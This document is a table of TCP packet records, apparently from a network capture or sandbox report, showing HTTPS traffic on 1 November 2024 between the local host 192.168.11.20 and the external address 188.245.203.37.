Nov 1, 2024 20:53:06.970196962 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.970309973 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.970818043 CET	49773	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:06.970870018 CET	443	49773	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.043426991 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.043607950 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.043817997 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.043848038 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.045193911 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.045238972 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.636693954 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.636743069 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.636778116 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.636926889 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.636971951 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.636997938 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.637310982 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.720782042 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.720834970 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.721086979 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.721086979 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.721143961 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.721384048 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.839056969 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.839107037 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.839231014 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.839407921 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.839447975 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.839787006 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.922805071 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.922875881 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.923017025 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.923074007 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.923111916 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.923193932 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.923362017 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.984021902 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.984075069 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.984232903 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.984343052 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:07.984388113 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:07.984580994 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.030276060 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.030324936 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.030436039 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.030509949 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.030545950 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.030637980 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.030742884 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.066847086 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.066890001 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.067053080 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.067114115 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.067137003 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.067218065 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.067387104 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.098752975 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.098793030 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.098886967 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.099124908 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.099162102 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.099422932 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.134341955 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.134383917 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.134557962 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.134588003 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.134608030 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.134823084 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.170001984 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.170043945 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.170150042 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.170371056 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.170397997 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.170676947 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.200021029 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.200062990 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.200170994 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.200403929 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.200440884 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.200700998 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.221286058 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.221299887 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.221466064 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.221621037 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.221632957 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.221941948 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.242379904 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.242393017 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.242607117 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.242621899 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.242628098 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.242675066 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.242938995 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.260536909 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.260550022 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.260735989 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.260792017 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.260802984 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.260912895 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.261073112 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.280134916 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.280148983 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.280273914 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.280383110 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.280395031 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.280539989 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.280654907 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.295897961 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.295911074 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.296119928 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.296278000 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.296289921 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.296475887 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.312808990 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.312823057 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.312993050 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.313065052 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.313076973 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.313237906 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.326304913 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.326318026 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.326455116 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.326554060 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.326560974 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.326646090 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.326749086 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.341342926 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.341356039 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.341520071 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.341573000 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.341584921 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.341712952 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.341873884 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.354608059 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.354620934 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.354753017 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.354753017 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.354823112 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.354830027 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.355003119 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.366802931 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.366816998 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.366950035 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.367146015 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.367157936 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.367285967 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.379893064 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.379905939 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.380055904 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.380055904 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.380099058 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.380110025 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.380224943 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.380383015 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.390805006 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.390816927 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.391026974 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.391125917 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.391138077 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.391391993 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.404895067 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.404908895 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.405046940 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.405065060 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.405072927 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.405157089 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.405349970 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.414805889 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.414819002 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.414930105 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.415051937 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.415064096 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.415209055 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.415308952 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.424832106 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.424844027 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.424966097 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.424966097 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.425163984 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.425175905 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.425307035 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.436135054 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.436148882 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.436347008 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.436357975 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.436422110 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.436553955 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.445509911 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.445519924 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.445689917 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.445744991 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.445749998 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.445807934 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.446013927 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.455118895 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.455127954 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.455271006 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.455456018 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.455465078 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.455615044 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.464065075 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.464071989 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.464232922 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.464232922 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.464282990 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.464287996 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.464490891 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.473726988 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.473736048 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.473895073 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.473896027 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.473908901 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.473989010 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.473994970 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.474159956 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.481709003 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.481719017 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.481904030 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.481957912 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.481962919 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.482192993 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.490127087 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.490138054 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.490294933 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.490294933 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.490345001 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.490350008 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.490453005 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.490593910 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.497518063 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.497529030 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.497714043 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.497767925 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.497771978 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.497910976 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.498063087 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.505958080 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.505968094 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.506127119 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.506206036 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.506211042 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.506386995 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.506488085 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.513242960 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.513252974 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.513484955 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.513492107 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.513539076 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.513695002 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.520371914 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.520381927 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.520662069 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.520668983 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.520818949 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.527786016 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.527796030 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.527925014 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.528125048 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.528131008 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.528435946 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.535718918 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.535728931 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.535861015 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.535912991 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.535912991 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.535918951 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.536045074 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.536222935 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.542268991 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.542279005 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.542448044 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.542491913 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.542496920 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.542567968 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.542737961 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.547149897 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.547158957 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.547310114 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.547357082 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.547362089 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.547468901 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.547597885 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.553575993 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.553586006 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.553785086 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.553883076 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.553888083 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.554042101 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.559463978 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.559472084 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.559643030 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.559643030 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.559709072 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.559714079 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.559817076 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.559923887 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.566246033 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.566255093 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.566425085 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.566514015 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.566519022 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.566648006 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.566723108 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.571388960 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.571397066 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.571533918 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.571583986 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.571588993 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.571676016 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.571818113 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.576749086 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.576757908 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.576901913 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.576953888 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.576960087 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.577018976 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.577315092 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.582640886 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.582648993 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.582801104 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.582869053 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.582875967 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.582959890 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.583115101 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.587616920 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.587625980 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.587743998 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.587835073 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.587837934 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.587951899 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.588078022 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.593096018 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.593126059 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.593303919 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.593359947 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.593364954 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.593487024 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.593632936 CET	49774	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:08.598170042 CET	443	49774	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:08.598177910 CET	443	49774	188.245.203.37	192.168.11.20
